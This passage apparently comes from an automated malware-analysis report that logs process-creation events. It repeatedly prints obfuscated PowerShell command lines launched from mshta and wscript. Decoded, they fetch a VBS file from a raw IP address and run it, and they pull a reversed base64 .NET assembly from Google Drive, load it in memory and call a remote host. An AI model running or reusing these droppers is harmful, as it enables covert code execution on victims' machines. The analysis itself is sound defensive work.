dEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"Jump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbG